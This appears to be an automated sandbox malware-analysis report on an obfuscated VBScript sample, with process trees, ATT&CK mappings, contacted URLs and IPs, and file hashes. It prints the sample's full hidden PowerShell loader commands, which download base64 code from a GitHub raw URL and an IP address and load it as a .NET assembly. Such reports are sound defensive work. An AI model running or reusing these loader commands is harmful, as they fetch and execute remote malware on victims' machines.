Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJyc", "0", "false");
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFAAC568148 push ebx; ret 6_2_00007FFAAC56816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFAAC569557 push esp; retf 6_2_00007FFAAC569558
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFAAC63236C push 8B485F91h; iretd 6_2_00007FFAAC632371
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFAAC6323BE push 8B485F91h; iretd 6_2_00007FFAAC6323C6
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1836
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1335
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2764
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6978
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep count: 2764 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348 Thread sleep count: 6978 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392 Thread sleep time: -16602069666338586s >= -30000s
Source: powershell.exe, 00000006.00000002.1383726636.000001776F5D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'')( (('sbourl '+'= u'+'nih'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'n'+'odet'+'ecton/nodet'+'ecto'+'n/'+'re'+'fs/head'+'s/main/detah'+'no'+'th-v.'+'t'+'xtu'+'ni; sb'+'oba'+'s'+'e6'+'4c'+'ontent = (ne'+'w-objec'+'t '+'s'+'yst'+'e'+'m'+'.net.w'+'ebclient).dow'+'nloadstr'+'ing'+'('+'sbourl'+'); sb'+'obinar'+'y'+'content '+'= [s'+'y'+'ste'+'m.co'+'n'+'v'+'ert'+']::fromb'+'a'+'s'+'e64s'+'tring'+'(sbo'+'base64c'+'o'+'ntent);'+' s'+'boas'+'sem'+'bly = [reflection.'+'assem'+'b'+'l'+'y]::'+'loa'+'d('+'sbobinaryconten'+'t); ['+'dnli'+'b.io.'+'home]'+'::vai'+'('+'hpitxt.rr'+'bd'+'l/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhpi, '+'hpidesativ'+'a'+'dohpi, '+'hp'+'id'+'e'+'s'+'at'+'ivado'+'hpi, h'+'pi'+'desativa'+'do'+'h'+'pi, '+'hp'+'iasp'+'net_regbrows'+'e'+'rshpi,'+' hpi'+'h'+'pi,'+'hpih'+'p'+'i)')-creplace 'uni',[char]39 -replace 'hpi',[char]34 -replace ([char]115+[char]66+[char]79),[char]36))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 221 Scripting | Valid Accounts | 11 Command and Scripting Interpreter | 221 Scripting | 11 Process Injection | 21 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label
uLfuBVyZFV.vbs | 8% | ReversingLabs | Win32.Trojan.Generic
uLfuBVyZFV.vbs | 6% | Virustotal |
No Antivirus matches
Source | Detection | Scanner | Label
raw.githubusercontent.com | 0% | Virustotal |
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | 6% | Virustotal |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Virustotal |
http://198.46.129.134 | 0% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
https://raw.githubusercontent.com | 0% | Virustotal |
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtUNI; | 0% | Virustotal |
http://198.46.129.134/450/LDBRR.txt | 0% | Virustotal |
http://raw.githubusercontent.com | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
raw.githubusercontent.com | 185.199.108.133 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | false | | unknown
http://198.46.129.134/450/LDBRR.txt | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.1364577618.0000017767224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000006.00000002.1348872454.00000177588D9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.1348872454.0000017758ACE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com | powershell.exe, 00000006.00000002.1348872454.00000177573D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177582C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.1348872454.0000017758ACE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000006.00000002.1348872454.00000177582C9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://198.46.129.134 | powershell.exe, 00000006.00000002.1348872454.00000177575DE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.1364577618.0000017767224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://raw.githubusercontent.com | powershell.exe, 00000006.00000002.1348872454.0000017758890000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 00000006.00000002.1348872454.00000177588D9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercont | powershell.exe, 00000006.00000002.1348872454.000001775888B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtUNI; | powershell.exe, 00000006.00000002.1348872454.00000177573D3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1396024247.000001C822913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1396024247.000001C8228EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177571B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1396024247.000001C822940000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177571B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.1348872454.0000017758ACE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://oneget.org | powershell.exe, 00000006.00000002.1348872454.00000177588D9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
198.46.129.134 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1523829
Start date and time: 2024-10-02 05:27:21 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: uLfuBVyZFV.vbs
renamed because original name is a hash value
Original Sample Name: 79c7020002b461319a5b25a22be2c4fabfcc5bcef788530d380ebd65872f4d9a.vbs
Detection: MAL
Classification: mal100.expl.evad.winVBS@6/5@1/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 10
• Number of non-executed functions: 1
    Cookbook Comments:
    • Found application associated with file extension: .vbs
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target powershell.exe, PID 2980 because it is empty
    • Execution Graph export aborted for target powershell.exe, PID 7304 because it is empty
• Not all processes were analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
23:28:20 | API Interceptor | 38x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.199.108.133 | iJEK0xwucj.vbs | malicious | Unknown |
185.199.108.133 | mitec_purchase_order_PDF (1).vbs | malicious | PXRECVOWEIWOEI Stealer |
185.199.108.133 | http://detection.fyi | malicious | NetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, Xmrig |
185.199.108.133 | asegura.vbs | malicious | Remcos |
185.199.108.133 | tCNVKM4mkt.exe | malicious | PureLog Stealer, XWorm |
185.199.108.133 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.28227.30541.rtf | malicious | Remcos |
185.199.108.133 | https://krakenqplogin.gitbook.io/us/ | malicious | HTMLPhisher |
185.199.108.133 | https://trezor-docs-info.github.io/ | malicious | HTMLPhisher |
185.199.108.133 | http://bafybeifqgf7hacp4ugl6xk57ans3phuwnlp3z3gnzdxkrgb5rfaoestwfy.ipfs.dweb.link/ | malicious | Unknown |
185.199.108.133 | http://gasbot-demos.vercel.app/ | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | WW8kzvnphl.vbs | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | 2THp7fwNQD.vbs | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | iJEK0xwucj.vbs | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | mitec_purchase_order_PDF (1).vbs | malicious | PXRECVOWEIWOEI Stealer | 185.199.108.133
raw.githubusercontent.com | 00#U2800.exe | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | asegurar.vbs | malicious | Remcos | 185.199.110.133
raw.githubusercontent.com | dcsegura.vbs | malicious | AsyncRAT, DcRat | 185.199.110.133
raw.githubusercontent.com | asegura.vbs | malicious | Remcos | 185.199.108.133
raw.githubusercontent.com | R183nzNa89.exe | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | hHNfR2jxEo.exe | malicious | PureLog Stealer, XWorm | 185.199.109.133
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | 2THp7fwNQD.vbs | malicious | Unknown | 107.172.130.147
AS-COLOCROSSINGUS | 0BO4n723Q8.vbs | malicious | PureLog Stealer | 107.172.148.248
AS-COLOCROSSINGUS | CEjWMdiJnR.exe | malicious | DanaBot | 23.95.182.47
AS-COLOCROSSINGUS | 8CRB0iJuy1.dll | malicious | DanaBot | 23.95.182.47
AS-COLOCROSSINGUS | CEjWMdiJnR.exe | malicious | DanaBot | 23.95.182.47
AS-COLOCROSSINGUS | 8CRB0iJuy1.dll | malicious | DanaBot | 23.95.182.47
AS-COLOCROSSINGUS | CANADAXORDER.xls | malicious | Snake Keylogger | 172.245.123.6
AS-COLOCROSSINGUS | Shipping Documents.xls | malicious | Remcos | 104.168.32.148
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.28227.30541.rtf | malicious | Remcos | 104.168.7.8
AS-COLOCROSSINGUS | Scan Order and Specification 01-10- 2024.docx | malicious | Remcos | 104.168.7.8
FASTLYUS | WW8kzvnphl.vbs | malicious | Unknown | 185.199.111.133
FASTLYUS | 2THp7fwNQD.vbs | malicious | Unknown | 185.199.111.133
FASTLYUS | iJEK0xwucj.vbs | malicious | Unknown | 185.199.108.133
FASTLYUS | mitec_purchase_order_PDF (1).vbs | malicious | PXRECVOWEIWOEI Stealer | 185.199.108.133
FASTLYUS | https://unpaidrefund.top/view/mygov | malicious | HTMLPhisher | 151.101.194.137
FASTLYUS | https://sanbernardinoscounty.telcom-info.com/ | malicious | HtmlDropper | 151.101.2.137
FASTLYUS | http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630 | malicious | Unknown | 151.101.194.137
FASTLYUS | http://detection.fyi | malicious | NetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, Xmrig | 185.199.110.154
FASTLYUS | 00#U2800.exe | malicious | Unknown | 185.199.110.133
FASTLYUS | https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jg | malicious | HTMLPhisher | 151.101.66.137
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | vr65co3Boo.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 185.199.108.133
3b5074b1b5d032e5620f69f9f700ff0e | f4576JaIo9.vbs | malicious | PureLog Stealer | 185.199.108.133
3b5074b1b5d032e5620f69f9f700ff0e | WW8kzvnphl.vbs | malicious | Unknown | 185.199.108.133
3b5074b1b5d032e5620f69f9f700ff0e | 89SkYNNpdi.vbs | malicious | AveMaria, PrivateLoader, PureLog Stealer | 185.199.108.133
3b5074b1b5d032e5620f69f9f700ff0e | qiEmGNhUij.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 185.199.108.133
3b5074b1b5d032e5620f69f9f700ff0e | 2THp7fwNQD.vbs | malicious | Unknown | 185.199.108.133
3b5074b1b5d032e5620f69f9f700ff0e | iJEK0xwucj.vbs | malicious | Unknown | 185.199.108.133
3b5074b1b5d032e5620f69f9f700ff0e | ZJbugHcHda.vbs | malicious | PureLog Stealer | 185.199.108.133
3b5074b1b5d032e5620f69f9f700ff0e | 0BO4n723Q8.vbs | malicious | PureLog Stealer | 185.199.108.133
3b5074b1b5d032e5620f69f9f700ff0e | PofaABvatI.vbs | malicious | AgentTesla, PureLog Stealer | 185.199.108.133
                        No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.773832331134527
Encrypted: false
SSDEEP: 3:Nlllulqtl:NllUO
MD5: B855D68D383D9FD249102892617B09C5
SHA1: 6A39BB7ADE083CA432D97AF9C9E97B48FD5D38F3
SHA-256: 42B89600A0F5480C0A5E6EA09D866291AFE991B0D18FEDD7A52C1E058F05AFFC
SHA-512: 66F755EB9A5028B72542EF51856431E3CEF7FC618F748D27D8FE727DDA1CB6DE429C7ADDDB5A851F32B650DF4D24A1BB207FE58E7A239DE976B3BD33EE82B1A6
Malicious: false
Reputation: low
Preview: @...e...........................................................
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit): 3.759785683047965
TrID:
• Text - UTF-16 (LE) encoded (2002/1) 64.44%
• MP3 audio (1001/1) 32.22%
• Lumena CEL bitmap (63/63) 2.03%
• Corel Photo Paint (41/41) 1.32%
File name: uLfuBVyZFV.vbs
File size: 272'340 bytes
MD5: 123316fb7db9c910bd92a9ad7e7bbdbc
SHA1: 43dbabc790f0a0e20b397ad707bb33cb77004998
SHA256: 79c7020002b461319a5b25a22be2c4fabfcc5bcef788530d380ebd65872f4d9a
SHA512: 464013dec9186c1ee3698641077de5fc5f7c8bb36c4e1f72d80b6a7c947fa8e288cfd64ee22741a67ec91110681cfdd7c05d54727f815b831987caeff80f473f
